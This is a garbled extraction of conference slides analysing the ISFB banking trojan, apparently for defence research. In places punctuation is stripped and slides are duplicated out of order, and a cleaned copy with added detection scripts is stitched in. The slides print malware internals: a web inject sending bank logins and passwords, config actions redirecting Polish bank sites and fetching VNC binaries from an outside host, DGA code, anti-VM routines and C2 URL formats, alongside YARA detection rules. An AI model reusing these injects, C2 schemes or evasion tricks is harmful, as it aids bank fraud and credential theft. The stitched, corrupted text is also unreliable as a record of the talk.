typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 10: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot


Web Actions

ACTION: REDIRECT - Target: myjs128.js -> http://51016736/di/myjs128_plv3.js
ACTION: REDIRECT - Target: myjs28.js -> http://51016736/di/myjs28_plv3.js
ACTION: REDIRECT - Target: ats8/gate.php -> http://51016736/azatsbmid/gate128.php
ACTION: REDIRECT - Target: https://www.centrum24.pl -> http://51016736/fk/cen1.php
ACTION: REDIRECT - Target: https://companynet.mbank.pl -> http://51016736/fk/mbiz1.php
ACTION: FILE - Target: prv
ACTION: VNC - Target: https://www.pekaobiznes24 | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
ACTION: VNC - Target: https://companynet.mbank.pl | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
ACTION: VNC - Target: https://iri | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
ACTION: VNC - Target: https://kiri | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
ACTION: VNC - Target: https://ibiznes2 | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
ACTION: VNC - Target: https://plhomebankin | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
ACTION: VNC - Target: https://hbfaces | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin

(the redirect host is shown as 51016736 on the extracted slide; its octet separators did not survive extraction)


The Bot

Registry Keys


Registry Keys

Software\AppDataLow\Software\Microsoft\[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

- Install
- Client
- NetCfg
- LastTask
- LastConfig
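A detection check built from the key pattern and value names above, added here as an example and not part of the talk. It reads a `reg export`-style dump offline (a constructed sample with a placeholder GUID is embedded), matches the GUID-named key under Software\AppDataLow\Software\Microsoft, and flags it when two or more of the listed value names are present; the threshold of two is an assumption chosen to tolerate partial installs, and the braces around the GUID are made optional since exports write them.

```python
import re

# Key pattern from the "Registry Keys" slide; braces around the GUID are optional here
ISFB_KEY_RE = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\Microsoft\\"
    r"\{?[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}\}?$",
    re.IGNORECASE,
)
# Value names listed on the slide
ISFB_VALUES = {"Install", "Client", "NetCfg", "LastTask", "LastConfig"}
MIN_HITS = 2   # ASSUMPTION: two or more of the names under one GUID key is enough to flag it


def parse_reg_export(text):
    """Minimal reader for `reg export` output: {key_path: set(value_names)}."""
    keys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, set())
        elif current is not None and line.startswith('"') and "=" in line:
            name = line[1:line.index('"', 1)]
            keys[current].add(name)
    return keys


def find_isfb_keys(keys):
    """Return (key_path, matched value names) for keys matching the slide's pattern."""
    hits = []
    for path, names in keys.items():
        if not ISFB_KEY_RE.match(path):
            continue
        matched = sorted(names & ISFB_VALUES)
        if len(matched) >= MIN_HITS:
            hits.append((path, matched))
    return hits


# Constructed sample export: placeholder GUID and values, plus two benign keys as noise
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\{1D3A5C7E-9B0F-4A2C-8E61-0F1E2D3C4B5A}]
"Install"=hex:01,00,00,00
"Client"=hex:aa,bb,cc,dd
"LastConfig"=hex:00,11,22,33

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Internet Explorer]
"Install"="1"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"""

if __name__ == "__main__":
    for path, matched in find_isfb_keys(parse_reg_export(SAMPLE_EXPORT)):
        print(path, matched)
```

On a live host the same check can be fed from `reg export "HKCU\Software\AppDataLow" dump.reg` taken during triage, which keeps the logic identical between the lab and the incident.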


Other Actions

- GET_CERTS
- GET_COOKIES
- GET_SYSINFO
- LOAD_EXE
- GET_FILES
- SOCKS_START
- GET_KEYLOG
- GET_MAIL
- GET_FTP
- VNC_START
- URL_BLOCK


Calling Home


ET phone home

- Static domains inside configuration files
- DGA based on a template and the current date
- C&C hidden in the TOR network
- P2P network


DGA

# Python 2 snippet from the slide; LsaRandom is the bot's own PRNG and is not shown here
rnd = LsaRandom()
rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0   # second seeding as shown on the slide; it overrides the first
r = []
for i in range(kwargs['count']):
    suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]   # rnd.choose(kwargs['tld'])
    dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
    wc = 0
    dom = []
    while wc < dom_l:
        d = rnd.choose(words)
        ws = len(d)
        if not rnd.rnd() % 3:
            ws //= 2            # every third word on average is cut in half
        if wc + ws > self.DGA_MAX_LEN:
            continue
        dom.append(d[:ws])
        wc += ws
    r.append(''.join(dom) + suf)

PYTHON

TOR

P2P

typedef struct {
    DWORD magic;        /* 0x395f2ec1 */
    DWORD my_secret;
    DWORD his_secret;
    BYTE  cmd0;
    BYTE  cmd1;
    BYTE  data[];
} isfb_p2p_inner_packet;

typedef struct {
    BYTE  flags;
    DWORD salt;                   /* 4 random higher bytes of keys */
    isfb_p2p_inner_packet p;      /* encrypted */
} isfb_p2p_packet;

C


Internet is Hard


URL format

https://%s/%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY

oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2UljOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

t[RAND][RAND]=data


URL format

import re
import pprint

# Python 2 snippet from the slide: decrypt() and SKEY (the Serpent key) are defined elsewhere
decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)   # undo the _XX escapes
try:
    e = d.decode('base64')
except Exception as e:
    d = d + '=='   # base64 padding is dropped in the URL; restore it
pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887


URL format

t.php           | get new task            | used until Sep 2015
c.php           | get new config          | used until Sep 2015
d.php           | send stolen data        | used until Sep 2015
images/*.gif    | get new task            | current format
images/*.jpeg   | get new config          | current format
images/*.bmp    | send stolen data        | current format
images/*.avi    | download 2nd stage dll  | not every C&C
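The request table above turned into detection logic over proxy log lines, added here as an example (not code from the talk). It maps the current images/*.ext scheme and the legacy t/c/d.php scheme to their purpose and flags the `_XX` hex escapes seen in the slide's example URL. The log line layout and the hosts and tokens are constructed for the example, and the requirement of a long `[A-Za-z0-9_]` token is an assumption meant to keep ordinary `/images/logo.gif` requests out.

```python
import re

# Request types from the "URL format" table: current /images/<token>.<ext> scheme and the
# legacy t.php / c.php / d.php scheme used until Sep 2015.
IMAGE_KINDS = {
    "gif": "get new task",
    "jpeg": "get new config",
    "bmp": "send stolen data",
    "avi": "download 2nd stage dll",
}
LEGACY_KINDS = {"t": "get new task", "c": "get new config", "d": "send stolen data"}

# ASSUMPTION: a long [A-Za-z0-9_] token separates the check-in URLs from ordinary image requests
IMAGES_RE = re.compile(r"^/images/([A-Za-z0-9_]{16,})\.(gif|jpeg|bmp|avi)$")
LEGACY_RE = re.compile(r"^/([tcd])\.php$")
# The _XX hex escapes (_2B, _2F in the slide's example) that decode_req unescapes
ESCAPE_RE = re.compile(r"_[0-9A-Fa-f]{2}")


def classify_path(path):
    """Return the ISFB request type for a URL path, or None if it fits neither scheme."""
    m = IMAGES_RE.match(path)
    if m:
        token, ext = m.groups()
        return {"scheme": "images", "kind": IMAGE_KINDS[ext],
                "escaped": bool(ESCAPE_RE.search(token))}
    m = LEGACY_RE.match(path)
    if m:
        return {"scheme": "legacy", "kind": LEGACY_KINDS[m.group(1)], "escaped": False}
    return None


def scan_proxy_log(lines):
    """Return (host, path, classification) for lines whose path looks like an ISFB check-in.

    Line layout (constructed for this example): ts client method host path status
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6:
            continue
        _ts, _client, _method, host, path, _status = parts[:6]
        c = classify_path(path.split("?", 1)[0])
        if c is not None:
            hits.append((host, path, c))
    return hits


# Constructed sample log lines (placeholder hosts and tokens, not real traffic)
SAMPLE_LOG = [
    "2016-11-30T10:01:02Z 10.0.0.5 GET cnc.invalid /images/aGVsbG8gd29ybGQ_2B_2FQUJDREVGR0hJSktMTU5P.jpeg 200",
    "2016-11-30T10:01:09Z 10.0.0.5 POST cnc.invalid /images/QUJDREVGR0hJSktMTU5PUFFSU1RV.bmp 200",
    "2016-11-30T10:02:00Z 10.0.0.7 GET www.example.invalid /images/logo.gif 200",
    "2016-11-30T10:03:15Z 10.0.0.9 GET old-cnc.invalid /t.php?mkvf=abcdef 200",
    "2016-11-30T10:04:30Z 10.0.0.5 GET cnc.invalid /images/QUJDREVGR0hJSktMTU5PUFFSU1RV.avi 404",
]

if __name__ == "__main__":
    for host, path, c in scan_proxy_log(SAMPLE_LOG):
        print("%-20s %-8s %-24s escaped=%s %s" % (host, c["scheme"], c["kind"], c["escaped"], path))
```

A `.bmp` POST is the line to chase first: by the table it carries stolen data, whereas `.gif` and `.jpeg` are the bot polling for tasks and config.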


C&C response


Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits.[2] The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.


C&C response


Command and Control


IAP

rewrite ^/fileto/(.*)\.(bin)   /get128.php?x=$1 break;
rewrite ^/images/(.*)\.(bmp)   /data.php?x=$1$2 break;
rewrite ^/images/(.*)\.(avi)   /loader.php?x=$1$2 break;
rewrite ^/images/(.*)\.(gif)   /task.php?x=$1$2 break;
rewrite ^/images/(.*)\.(jpeg)  /config.php?x=$1$2 break;

IAP

Dreambot

RewriteEngine on
RewriteRule ^c(.+)\.php$  new_chandler.php [L,QSA]
RewriteRule ^t(.+)\.php$  new_thandler.php [L,QSA]
RewriteRule ^d(.+)\.php$  new_dhandler.php [L,QSA]
RewriteRule ^images/(.*)\.(bmp)   new_dhandler.php?q=$1$2 [L,QSA]
RewriteRule ^images/(.*)\.(gif)   new_thandler.php?q=$1$2 [L,QSA]
RewriteRule ^images/(.*)\.(jpeg)  new_chandler.php?q=$1$2 [L,QSA]

Dreambot

Dreambot

rule isfb_dreambot : banker
{
    meta:
        author = "mak"
        module = "isfb"
    strings:
        $str0 = "vmware" fullword
        $str1 = "vbox" fullword
        $str2 = "virtual hd" fullword
        $str4 = "qemu" fullword
        $str3 = "c321.txt" fullword
    condition:
        all of them and isfb_dropper
}


The End, or not


Offsprings and Cousins

Common Roots / Payloads

Payloads:
- Nymaim
- Powersniff / PunchyBagg

Common Roots:
- Bolek/KBOT - based on gozi
- Rovnix - ISFB was the ring3 payload protected by rovnix
- Vawtrak - nothing in common


Recap

- One of the oldest bankers under active development
- Interesting solutions
- Various methods of infection
- Elaborate communication methods: DGA, P2P, TOR
- Old bugs die hard
- Read the paper for more details
- Code soon available at mak's github: random-stuff/isfb


Kudos: people that knowingly (or not) helped us

- Slavo
- Paul Black
- Kafeine
- Peter Kruse
- Piotr Kijewski
- Jarosław Jedynak
- Horgh
- Frank Ruiz


Q & A

info@cert.pl, www.cert.pl

CERTPolska

CERTPolska_en

mak, mak@cert.pl


The Dropper, or where the ancients reside


Welcome to the system

- achieve persistency
- inject worker
- setup IPC
- new: download 2nd stage


Useless strings


One Rule to rule them all

rule isfb_dropper : banker
{
    meta:
        author = "mak"
        module = "isfb"
    strings:
        $str0 = "Tape Device" fullword
        $str1 = "ASCIT8" fullword
        $str2 = "IEEE 1394"
        $str3 = ".bss"
        // the ?? byte wildcard and the trailing nibble wildcard are reconstructed; the extraction dropped them
        $decode_bss = { 8D 7D ?? AB 66 AB 6A 08 AA 68 [4] 8D 5? }
    condition:
        $decode_bss and 1 of ($str*)
}


Anti-VM

/* the key fed to decode_bss depends on how far the cursor moved since the last iteration */
do {
    pci.cbSize = 20;                        /* sizeof(CURSORINFO) */
    GetCursorInfo(&pci);
    ret = decode_bss(pci.ptScreenPos.y - old_y - old_x + pci.ptScreenPos.x);
    old_x = pci.ptScreenPos.x;
    old_y = pci.ptScreenPos.x;              /* sic: old_y takes the x coordinate, as on the slide */
} while (ret == 12);                        /* 12: decode_bss reports a wrong checksum, try again */

C


Anti-VM

DeviceInfoData.cbSize = 28;
if ( SetupDiEnumDeviceInfo(v1, 0, &DeviceInfoData) )
{
